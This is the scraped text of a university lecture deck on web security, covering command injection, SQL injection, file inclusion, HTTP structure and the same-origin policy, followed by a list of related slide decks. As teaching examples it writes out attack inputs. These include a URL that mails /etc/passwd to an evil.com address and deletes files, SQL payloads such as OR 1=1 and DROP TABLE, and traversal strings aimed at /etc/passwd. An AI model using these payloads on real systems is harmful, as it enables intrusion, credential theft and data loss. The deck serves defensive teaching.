web security part 1
play

Web Security, Part 1 (as usual, thanks to Dave Wagner and Vern - PowerPoint PPT Presentation

Sep 13, 2023 •155 likes •1.09k views

Web Security, Part 1 (as usual, thanks to Dave Wagner and Vern Paxson) 1 Web Server Threats What can happen? Compromise Defacement Gateway to attacking clients Disclosure (not mutually exclusive) And what makes

  1. Web Security, Part 1 (as usual, thanks to Dave Wagner and Vern Paxson) 1

  2. Web Server Threats • What can happen? – Compromise – Defacement – Gateway to attacking clients – Disclosure – (not mutually exclusive) • And what makes the problem particularly tricky? – Public access – Mission creep 2

  3. 3

  4. 4

  5. 5

  6. 6

  7. 7

  8. 8

  9. 9

  10. 10

  11. 11

  12. 12

  13. 13

  14. 14

  15. 15

  16. 16

  17. Attacking Via HTTP URLs: Global identifiers of network-retrievable resources http://user:pass@berkeley.edu:81/class?name=cs161#homework Protocol Fragment Host Username Port Path Query Password 17

  18. Simple Service Example • Allow users to search the local phonebook for any entries that match a regular expression • Invoked via URL like: http://harmless.com/phonebook.cgi?regex=<pattern > • So for example: http://harmless.com/phonebook.cgi?regex=daw|vern searches phonebook for any entries with “daw” or “vern” in them • (Note: web surfer doesn’t enter this URL themselves; an HTML form constructs it from what they type) 18

  19. Simple Service Example, con’t • Assume our server has some “glue” that parses URLs to extract parameters into C variables – and returns stdout to the user • Simple version of code to implement search: /* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char cmd[512]; sprintf(cmd, "grep %s phonebook.txt", regex); system(cmd); } 19

  20. Simple Service Example, con’t • Assume our server has some “glue” that parses URLs to extract parameters into C variables – and returns stdout to the user • Simple version of code to implement search: /* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char cmd[512]; snprintf(cmd, sizeof cmd, "grep %s phonebook.txt", regex); system(cmd); } Are we done? 20

  21. A Digression into Breakfast Cereals • 2600 Hz tone a form of inband signaling • Beware allowing control information to come from data • (also illustrates security-by-obscurity) 21

  22. /* print any employees whose name * matches the given regex */ void find_employee(char *regex) { Problems? char cmd[512]; snprintf(cmd, sizeof cmd, "grep %s phonebook.txt", regex); system(cmd); } Instead of http://harmless.com/phonebook.cgi?regex=daw| vern How about http://harmless.com/phonebook.cgi?regex=foo; %20mail %20-s%20hacker@evil.com%20</etc/passwd;%20rm 22

  23. How To Fix Command Injection ? snprintf(cmd, sizeof cmd, "grep ’ %s ’ phonebook.txt", regex); … regex=foo ’ ; mail -s hacker@evil.com </etc/passwd; rm ’ Okay, then scan regex and strip ’ - does that work? regex=O ’ Malley Okay, then scan regex and escape ’ … . ? regex ⇒ O\ ’ Malley (not actually quite right, but ignore that) … regex=foo\ ’ ; mail … ⇒ … regex=foo\\ ’ ; mail … (argument to grep is “foo\”) Okay, then scan regex and escape ’ and \ … . ? … regex=foo\ ’ ; mail … ⇒ … regex=foo\\\ ’ ; mail … (argument to grep is “foo\ ’ ; mail … ”) 23

  24. Input Sanitization • In principle, can prevent injection attacks by properly sanitizing input – Remove inputs with meta-characters • (can have “collateral damage” for benign inputs) – Or escape any meta-characters (including escape characters!) • Requires a complete model of how input subsequently processed – E.g. … regex=foo%27; mail … – E.g. … regex=foo%25%32%37; mail … » Double-escaping bug • And/or: avoid using a feature-rich API – KISS + defensive programming 24

  25. /* print any employees whose name * matches the given regex */ void find_employee(char *regex) { char *path = "/usr/bin/grep"; char *argv[10];/* room for plenty of args */ char *envp[1]; /* no room since no env. */ int argc = 0; argv[argc++] = path;/* argv[0] = prog name */ argv[argc++] = "-e";/* force regex as pat.*/ argv[argc++] = regex; argv[argc++] = "phonebook.txt"; argv[argc++] = 0; envp[0] = 0; if ( execve(path, argv, envp) < 0 ) command_failed( ..... ); } 25

  26. Command Injection in the Real World 26

  27. Command Injection in the Real World 27

  28. Structure of Modern Web Services URL / Form Web Browser server Web page built from database command.php? arg1=x&arg2=y Database server 28

  29. PHP: Hypertext Preprocessor • Server scripting language with C-like syntax • Can intermingle static HTML and code <input value=<?php echo $myvalue; ?>> • Can embed variables in double-” strings $user = “world”; echo “Hello $user!”; Or $user = “world”; echo “Hello” . $user . “!”; • Form data in global arrays $_GET, $_POST, … 29

  30. SQL • Widely used database query language • Fetch a set of records SELECT * FROM Person WHERE Username=‘oski’ • Add data to the table INSERT INTO Person (Username, Balance) VALUES (‘oski’, 10) • Modify data UPDATE Person SET Balance=42 WHERE Username=‘oski’ • Query syntax (mostly) independent of vendor 30

  31. SQL Injection Scenario • Sample PHP $recipient = $_POST[‘recipient’]; $sql = "SELECT PersonID FROM Person WHERE Balance < 100 AND Username='$recipient' "; $rs = $db->executeQuery($sql); • How can recipient cause trouble here? –How can we see anyone’s balance? 31

  32. SQL Injection Scenario, con’t WHERE Balance < 100 AND Username='$recipient' "; • recipient = foo ' OR 1=1 -- (“--” is a comment, it masks the lack of closing ‘) • Or foo '; DROP TABLE Person; -- ? • Or … change database however you wish 32

  33. SQL Injection: Retrieving Data Victim Server post malicious form 1 2 unintended query Attacker receive valuable data 3 Victim SQL DB 33

  34. SQL Injection: Modifying Data Victim Server post malicious form 1 2 unintended command Attacker 3 Database modified Victim SQL DB 34

  35. Defenses (work in progress) Defenses (work-in-progress) Character-­‑level ¡ taint ¡tracking : Check ¡that ¡keywords, ¡metachars ¡are ¡untainted. SELECT ¡u ¡FROM ¡t ¡WHERE ¡n='Bobby' ¡ ¡ ü ¡ SELECT ¡u ¡FROM ¡t ¡WHERE ¡n='Bobby' ¡OR ¡1=1 ¡-­‑-­‑' ¡ ¡ ¡ ¡ û Secure ¡template ¡languages: Template ¡languages ¡should ¡automa9cally ¡quote or ¡encode ¡subs9tu9ons ¡appropriately. <P>Hello ¡${username}! ¡ ¡Welcome ¡back. 35

  36. Injection via file inclusion 2. PHP code executed by server 3. Now suppose COLOR=http://badguy/evil Or: COLOR=../../../etc/passwd%00 A form of directory traversal (or path traversal ). Can also work directly w/ URLs: e.g.: http://victim.com/cgi-bin/../../../../../etc/passwd (seen every day) 36

  37. Questions? 37

  38. Basic Structure of Web Traffic 38

  39. HTTP Request Method Resource HTTP version Headers GET /index.html HTTP/1.1 Accept: image/gif, image/x-bitmap, image/jpeg, */* Accept-Language: en Connection: Keep-Alive User-Agent: Mozilla/1.22 (compatible; MSIE 2.0; Windows 95) Host: www.example.com Referer: http://www.google.com?q=dingbats Blank line Data (if POST; none for GET) GET: download data. POST: upload data. 39

  40. HTTP Response HTTP version Status code Reason phrase Headers HTTP/1.0 200 OK Date: Sun, 19 Apr 2009 02:20:42 GMT Server: Microsoft-Internet-Information-Server/5.0 Connection: keep-alive Content-Type: text/html Data Last-Modified: Sat, 18 Apr 2009 17:39:05 GMT Set-Cookie: session=44eb; path=/servlets Content-Length: 2543 <HTML> Some data... blah, blah, blah </HTML> Cookies 40

  41. Web Page Generation • Can be simple HTML: <HTML> <HEAD> <TITLE>Test Page</TITLE> </HEAD> <BODY> <H1>Test Page</H1> <P> This is a test!</P> </BODY> </HTML> 41

  42. Web Page Generation • Or a program, say written in Javascript : <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>Javascript demo page</title> </head> <body> <script type="text/javascript"> var a = 1; Or what else? Or what else? var b = 2; Java, Flash, document.write(a+b); Active-X, PDF … </script> </body> </html> 42

  43. Structure of Web Traffic, con’t 43

  44. Structure of Web Traffic, con’t 44

  45. Browser Windows Interact How to control just what they’re allowed to do? 45

  46. Same-Origin Policy How does the browser isolate different sites? (Thanks in part to John Ousterhout and Giovanni Vigna) 46

  47. The Isolation Problem Web content comes from many sources, not all equally trusted Trusted and untrusted content are in close proximity n frames, tabs, sequential visits Must separate various forms of content so that untrusted content cannot corrupt/misuse trusted content 47

Download Presentation
Download Policy: The content available on the website is offered to you 'AS IS' for your personal information and use only. It cannot be commercialized, licensed, or distributed on other websites without prior consent from the author. To download a presentation, simply click this link. If you encounter any difficulties during the download process, it's possible that the publisher has removed the file from their server.

Recommend

Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the

Com puter Security Part One Security as a subject Security is an old problem in the computing world, and are parallel to even older problems outside computing Required level of security is always related to what you protect

237 views • 23 slides
Dawn Song dawnsong@cs.berkeley.edu 1 Part II OS &amp; Web Security OS Security Web

Dawn Song dawnsong@cs.berkeley.edu 1 Part II OS &amp; Web Security OS Security Web

Safe Extension Dawn Song dawnsong@cs.berkeley.edu 1 Part II OS &amp; Web Security OS Security Web Security More esoteric topics Click fraud, etc. Reputation systems &amp; trust metrics Few papers, but local experts

420 views • 5 slides
The Methodology of Provable Security Marc Joye Thomson Security Labs marc.joye@thomson.net

The Methodology of Provable Security Marc Joye Thomson Security Labs marc.joye@thomson.net

The Methodology of Provable Security Marc Joye Thomson Security Labs marc.joye@thomson.net DIWALL Seminar March 20, 2008 Contents Part I Introduction Part II Signature Schemes Part III Encryption Schemes Part IV Conclusion Part I

463 views • 24 slides
Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security

Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security

Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security Part of the best in the Developed by world Driven by the market Cyber Threat space champions experts Heimdal Security is part of Gartners

322 views • 17 slides
Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security

Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security

Heimdal - The Cyberthreat Security Suite - We protect what others cant About Heimdal Security Part of the best in the Devised by world Driven by experienced Cyber Threat space champions experts Heimdal Security is part of the best in The

712 views • 43 slides
Announcements Schedule Web security part 1 today, part

Announcements Schedule Web security part 1 today, part

Announcements Schedule Web security part 1 today, part 2 in two weeks Next week: guest lecture by David Parter on Oct 15

749 views • 36 slides
Com puter Security - Part Three Last tim e Multilevel and multilateral security Threats

Com puter Security - Part Three Last tim e Multilevel and multilateral security Threats

Com puter Security - Part Three Last tim e Multilevel and multilateral security Threats Security policies Confidentiality Policies Policy The Bell-LaPadula Model Specification Integrity Policies The Biba

698 views • 49 slides
Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software

Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software

1 Software and Web Security deel 2 deel 2 sws1 Software and Web Security - 1 &amp; 2 y Software is the main source of security vulnerabilities esp in systems accessible via a network i t ibl i t k part 1 part 1 security problems

672 views • 65 slides
- Systems Security: Part 1 - Prof. Dr. Michael Backes Director, CISPA Center for IT Security,

- Systems Security: Part 1 - Prof. Dr. Michael Backes Director, CISPA Center for IT Security,

Introduction to Cybersecurity - Systems Security: Part 1 - Prof. Dr. Michael Backes Director, CISPA Center for IT Security, Privacy, and Accountability Chair for IT-security &amp; Cryptography General Information Correct formatting

1.05k views • 75 slides
Summary Security: Applications &amp; Aspects Part I Cryptographic Features Introduction

Summary Security: Applications &amp; Aspects Part I Cryptographic Features Introduction

Summary Security: Applications &amp; Aspects Part I Cryptographic Features Introduction Software vs Hardware Support Hardware Acceleration Solutions Processor Extensions for Security Basic Cyphering Part II Symmetric vs Asymmetric

1.14k views • 21 slides
Com puter Security Part Tw o Previously Introduction Threat analysis Threats

Com puter Security Part Tw o Previously Introduction Threat analysis Threats

Com puter Security Part Tw o Previously Introduction Threat analysis Threats Policy Specification Design Implementation Operation and Maintenance Now Multilateral and Multilevel security Security policies

355 views • 24 slides
Part I: OUTER SPACE SECURITY and An Update on Outer Space Security A BRIEF

Part I: OUTER SPACE SECURITY and An Update on Outer Space Security A BRIEF

23-May-18 AN INTRODUCTION TO Part I: OUTER SPACE SECURITY and An Update on Outer Space Security A BRIEF HISTORY OF THE PREVENTION OF AN ARMS RACE IN OUTER SPACE Two presentations to inform CD Subsidiary Body 3 discussion 23

672 views • 8 slides
Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John

Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John

Web Security, Part 2 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/ Feb 3, 2010 With thanks for some

295 views • 28 slides
Web Security, Part 1 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John

Web Security, Part 1 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John

Web Security, Part 1 CS 161 - Computer Security Profs. Vern Paxson &amp; David Wagner TAs: John Bethencourt, Erika Chin, Matthew Finifter, Cynthia Sturton, Joel Weinberger http://inst.eecs.berkeley.edu/~cs161/ Feb 1, 2010 Web Server Threats

274 views • 16 slides
ORC Chapter 420-3-26-.15 and 10 CFR Part 37 Changes to Physical Security Protection Requirements

ORC Chapter 420-3-26-.15 and 10 CFR Part 37 Changes to Physical Security Protection Requirements

ORC Chapter 420-3-26-.15 and 10 CFR Part 37 Changes to Physical Security Protection Requirements A Brief History of Security Measures - 11/14/05 - EA-05-090: NRC Order Imposing Increased Controls (IC). In Alabama the Orders were implemented by

498 views • 27 slides
Part 5 Usability and Security Cognitive Errors, Usability vs. Security, Groupware Antonio Cerone

Part 5 Usability and Security Cognitive Errors, Usability vs. Security, Groupware Antonio Cerone

Phd course on Formal modelling and analysis of interactive systems Part 5 Usability and Security Cognitive Errors, Usability vs. Security, Groupware Antonio Cerone United Nations University International Institute for Software Technology

1.76k views • 109 slides
Managing Public Records: Master Clerks Academy II Presented by: Courtney Bailey Records

Managing Public Records: Master Clerks Academy II Presented by: Courtney Bailey Records

11/18/2019 Managing Public Records: Master Clerks Academy II Presented by: Courtney Bailey Records Analysis Unit Government Records Section State Archives of North Carolina 1 Objectives Review public records laws in North Carolina

1.21k views • 26 slides
Data Sharing in NHSN: The Confer Rights Template (Patient Safety Component) June 2011 National

Data Sharing in NHSN: The Confer Rights Template (Patient Safety Component) June 2011 National

Data Sharing in NHSN: The Confer Rights Template (Patient Safety Component) June 2011 National Center for Emerging and Zoonotic Infectious Diseases Division of Healthcare Quality Promotion Objectives Objectives Review NHSNs Group

609 views • 34 slides
Request Bank Records Thursday, January 7, 2016 Presented by: Joe Snyder Older Adults Protective

Request Bank Records Thursday, January 7, 2016 Presented by: Joe Snyder Older Adults Protective

APS Administrators Webinar Revised Standard Form for APS to Request Bank Records Thursday, January 7, 2016 Presented by: Joe Snyder Older Adults Protective Services Director, Philadelphia Corporation for Aging Kathleen Quinn Executive

390 views • 10 slides
Preparing Deposit and Service Reports 50-928C, 4/20/E GoToWebinar employer_education@strsoh.org

Preparing Deposit and Service Reports 50-928C, 4/20/E GoToWebinar employer_education@strsoh.org

State Teachers Retirement System of Ohio Preparing Deposit and Service Reports Preparing Deposit and Service Reports 50-928C, 4/20/E GoToWebinar employer_education@strsoh.org 1 State Teachers Retirement System of Ohio Preparing Deposit and

683 views • 19 slides
Lecture 2.3 Post-tensioned Concrete Dr. Hazim Dwairi Precast Segmental Bridges Dr. Hazim Dwairi

Lecture 2.3 Post-tensioned Concrete Dr. Hazim Dwairi Precast Segmental Bridges Dr. Hazim Dwairi

Prestressed Concrete Hashemite University The Hashemite University Dept. of Civil Engineering Lecture 2.3 Post-tensioned Concrete Dr. Hazim Dwairi Precast Segmental Bridges Dr. Hazim Dwairi 1 Prestressed Concrete Hashemite University

1.05k views • 17 slides
Content: 1. Principal task in EGS development 2. A methodology: HEX-S code 3. Example: Coso

Content: 1. Principal task in EGS development 2. A methodology: HEX-S code 3. Example: Coso

A Methodology for the Hydro-mechanical Characterisation of EGS reservoirs Session: Reservoir characterisation during stimulation Content: 1. Principal task in EGS development 2. A methodology: HEX-S code 3. Example: Coso geothermal field,

742 views • 25 slides
Bitcoin and Beyond The World of CryptoCurrencies Math 2018 to date Lecturer, NTU,

Bitcoin and Beyond The World of CryptoCurrencies Math 2018 to date Lecturer, NTU,

Bitcoin and Beyond The World of CryptoCurrencies Math 2018 to date Lecturer, NTU, Singapore Math 2014 - 2017 Lecturer, ISI Kolkata, India EE, CS 2010 - 2014 PhD, Computer Science 2006 - 2008 MMath, Pure Mathematics 2002 -

1.14k views • 90 slides
Performance and cost effectiveness of caching in mobile access networks Jim Roberts (IRT-SystemX)

Performance and cost effectiveness of caching in mobile access networks Jim Roberts (IRT-SystemX)

Performance and cost effectiveness of caching in mobile access networks Jim Roberts (IRT-SystemX) joint work with Salah Eddine Elayoubi (Orange Labs) ICN 2015 October 2015 The memory-bandwidth tradeoff preferred cache size depends on

762 views • 28 slides

More recommend